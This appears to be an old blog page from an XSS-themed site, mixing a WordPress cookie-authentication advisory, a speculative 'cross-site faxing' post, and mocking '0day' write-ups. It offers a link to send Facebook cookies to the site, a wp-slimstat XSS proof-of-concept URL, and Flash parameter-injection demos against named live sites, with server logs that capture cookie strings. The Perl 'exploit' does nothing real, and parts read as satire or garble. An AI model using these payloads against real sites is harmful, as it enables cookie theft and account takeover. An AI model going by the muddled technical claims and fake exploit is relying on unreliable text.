XSS Worm : Cross Site Scripting & Web 2.0 Security

In this video tutorial we show you how to do basic cross site scripting attacks against a vbulletin forum. This tutorial shows the basics of cookie stealing, javascript injection and forum hacking.

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system. Most content management systems and blogs save user passwords as hashes in the underlying database. So even if attackers were to get access to the hashes stored in the database, for instance by means of an SQL injection hole, they have not been able to do much with them up to now.”

http://en.wikipedia.org/wiki/Password_Cracking

“Specifically, if they want to recover the passwords, they would have to compare a hash with entries in a “rainbow table” – a process that can take some time and may not work at all for long passwords, for which there simply are no tables.”

“But according to a security advisory published by Stephen J. Murdoch of the University of Cambridge, a property in WordPress can be exploited to get access without the password. Instead of trying to obtain the password, Murdoch used its hash to generate an authentication cookie to gain access to the system. A member of the core team behind The Onion Router (TOR) anonymization project, Murdoch says that the MD5 hash only has to be hashed a second time with MD5. According to his report, the authentication procedure implemented in WordPress then looks like:

wordpresspass_<MD5(url)>=MD5(user_pass)

Here, the URL is clearly spelled out, and user_pass corresponds to the hash (MD5(password)). Along with the wordpressuser cookie (that wordpressuser_<MD5(url)>=admin), access is then reportedly provided to the WordPress admin account. Murdoch says he has informed the developers of WordPress of the problem, but they have yet to react.”

http://en.wikipedia.org/wiki/HTTP_cookie

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system.”

This attack is very dangerous 0day for wordpress 2.3, and it only requires the hacker to compromise adminitrator access to wordpress using another more serious hole, and then instead of using admin access or creating new users or modifying user or backdoor into wordpress, he can take encrypted md5 from hacked database and gain access as a user to the wordpress he has previously hacked. All user are encouraged for upgrades. See more:

Sources:

http://heise-security.co.uk/ - Security and Internet Security Expert Consultants.

http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt

Dr Craig Wright has described a new attack vector known as Cross-Site Faxing (XSF) that abuses weaknesses in OCR 2.0 anti-phishing technology to bypass commercial anti-CSF appliances such as the i-XSS BloggerShield and UBsecure’s new XRCF Webfender 2.1.

On Nov 18, Dr Craig Wright (cwright@bdosyd.com.au) writes to pen-test:

“I have thought of an alternate path to loading a virus bases on a network OCR’d fax server. In the scenario, we have to assume that the system is sending the output to a web front end or HTTP enabled email (not that uncommon).”

Dr Wright subsequently illustrates to the reader what he has previously written using the following hypothetical scenario:

• The system has no input filters and prints all characters to the email, web app.
• The OCR engine is highly accurate and does not add spaces etc.
• The email or web app displays exactly what it received

“Now given that scenario, we have a possible XSS (cross-site-scripting) attack. If there are no filters for an outgoing connection (i.e. no firewall/proxy that strips scripts) and the client browser/email application allows access to the Internet, the attacker could create a script in the page that makes a call to an external system to download a file … a script could also embed a simple XOR obfuscation key to modify the downloaded code. On the web server it would be inert. When XOR’d with the key in the script (after being downloaded and installed), this will thus bypass the AV server (if there is one) and install the malware on the users system. […] Regards, Dr Craig Wright (GSE-Compliance)”

It is interesting to see this challenge considered by the security community. Are there currently any products we can purchase to scan incoming faxes? What about physical mail? A malicious attacker could embed scripting into an application form that is then printed and sent through snail mail to a recipient mail desk which scans the mail and forwards as a pdf or tiff image to the unsuspecting victim.

This attack is very deadly as it takes advantage of embed or macro or client side exploits against pdf or tiff clients and users. This is a very dangerous attack vector that must be explored, and all security consultants are encouraged to alert the wider community of the dangers of Cross Site Faxing and Cross-Site Postage exploits.

Click here to send your facebook cookies to xssworm (-;

http://www.facebook.com/share_redirect.php?h=fef648d6fe6177edfa9ff58e779a83&url=http%3A%2F%2Fwww.facebook.com%2Fshare_redirect.php%3Fh%3D0%26url%3Dhttp%3A%2F%2Fxssworm.com&sid=6330305874

We can upload JPG injected with JAR? or 2nd pass of redirect bugs. Facebook now allows embed of mp3 and other items using share bookmarks

javascript:var d=document,f=’http://www.facebook.com/share’,l=d.location,e=encodeURIComponent,p=’.php?src=bm&v=4&i=1182484661&u=’+e(l.href)+’&t=’+e(d.title);1;try{if(!/^(.*\.)?facebook\.[^.]*$/.test(l.host))throw(0);share_internal_bookmarklet(p)}catch(z){a=function(){if(!window.open(f+’r'+p,’sharer’,'toolbar=0,status=0,resizable=0,width=626,height=436′))l.href=f+p};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else{a()}}void(0)

Facebook has many hole like this

vaj.

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious holes in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to public and this is first day of public vulnerability, and 0day means ‘published.’

Below is demonstration attack against wordpress install at http://xssworm.blogvis.com – please do not use him for you attack as we do not have a patch for this 0day exploit. XSSWorm admin is being alerted and look for suspicious click (-;

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack to be used against wordpress web blog blogmin to steal blogosphere token to hack blogs. Of course we have included exploit code for this bug at the below.

We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here:

–snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
‘.(!empty($myFilterString)?’— <a href=”?page=’.$_GET[’page’].’&panel=’.$_GET[”panel”].’”>’.__(’Reset filters’, ‘wp-slimstat’).’</a>’:”).’
<input type=”hidden” name=”page” value=”‘.$_GET[’page’].’” />
<input type=”hidden” name=”panel” value=”‘.$_GET[”panel”].’” />
<input type=”hidden” name=”fd” value=”‘.$_GET[”fd”].’” /></form>’;

–snips

With programmor using $_GET variable from user into echo into html output maybe php automatic GET validation filtering is not working for security? We are not programmers of php so we cannot see any porblems here as bug are too complex to understand.

Exploit code for perl whitehats included here:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS:Simple;
#use Math;
use Socket;

print “Welcome. What is target email address of wordpress blog admin : \n”;
my $target = <STDIN>;
print “ok target is $target\n”;
sleep(3);
print “ok What is address of wordpress blog : \n”;
sleep(5); my $address = <STDIN>;
print “ok target is $target\n”;
sleep(6);
# print “testing”
print “ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n”;
print “\n\n — CUT OUTPUT HERE — \n\n”;
print “HELO xssworm.com\n”;
print “RSET\n”;
PRINT “MAIL FROM: <xssworm@hotmail.com>\n”;
print “RCPT TO: <$target>\n”;
print “DATA\n”; print “Free x pciture and movies at $address\n”;
print “\r\n.\r\nquit\r\n”;
print “\n\n — END OF OUTPUT CUT HERE –\n”;
print “”;
print “Ok now you neeed to cut the exploit above and paste it to:\n”;
print “$address : 25 \n”;
print “Shellcode by vaj@xssworm.com c. 2007\n”;
print “End of attack.\n”;
print “”;
#print “Debug mode on”
#print “XSS initialized”
#payload
sleep(1); return(0);
# snips
#

Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is opened to blackkhat attack via transport of xss.

Many thanks for your comments on this vulnerability in wordpress 2.4

Thanks vaj

Here we have some demonstration of proofs for XSS Scripting attacks and cross flash forgery on many sites.

Many hopes for our readers to leave some feedback on these serious vulnerabilities.

SWF Exploit 1.)

We make a hit with browser to target shockwave

http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true

but in a localhost is seen

Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

..

(-;

Maybe the Blackhat attack to deny server users : host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com

also browser says:

http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true

but in logger we are seeing:

Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

& in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish:

MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC

Demo:

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&

We see logs outputs in XSSWORM.com ::
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE000039DC|4726056DCE] s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D=[CS]v4|473350E200004A7E-A000C800004398|473350E2[C
E]; s_vi_zox7Ekigx7Ex7De=[CS]v|47009D8E00027B7-A000B0400000F80|400A7C4[CE];
s_vi_kefx7Dhxxkdn=[CS]v4|4707E570000074C7-A1606500003648|47200DA4DB[CE]; s_vi_jd
ghjfxxliyo=[CS]v4|4726056E0000760-A00070BAE000039DC|4726056[CE]; svi_nyhylx7B89
x3E=[CS]v4|46FEC0DF0004AB3-A00B28000180|46FEC0D[CE]; s_vi_hfedldmx0×7B=[CS
]v4|4725839500005A8F-A160B1700007C|472605EC[CE]; s_vi_x7Dx6067zbhx7Dl=[CS]v4|4
6FEC0C4000077C6-A160B2100003DDF|4EC4EC0C4[CE]; s_vi_ox7Dyhex700Ffnoxx=[C]v4|4FEC0
BC00003E04-A000B000075F|46C0BBCE]; s_vi_pogx7F4k=[CS]v7208C000DB-A
290B5A000015EB|47208C61[CE]; s_vi_igdx7Fxxiae=[CS]v4|47225ED8000044DD-A140A36000
02900|47225ED7[CE]; s_vi_brcxxaabctrxxatkppc=[CS]v4|4709002200006037-A290A9D0000
6E2E|4717A488[CE]; s_vi_kefx7Dhndfyx7B=[CS]v4|470EE04300002808-A140A2500000049|4
70EE043[CE]; s_vi_chsts003DBF|4734B658[CE]; s_vi_svx7Cywxxdsux7Edbuqe=[CS]v4|47351D–

snips…

We see many more serious vulnerability in the web 2.0 today.

Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true

In server log:

connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/

(;

Please leave nice XSS comments.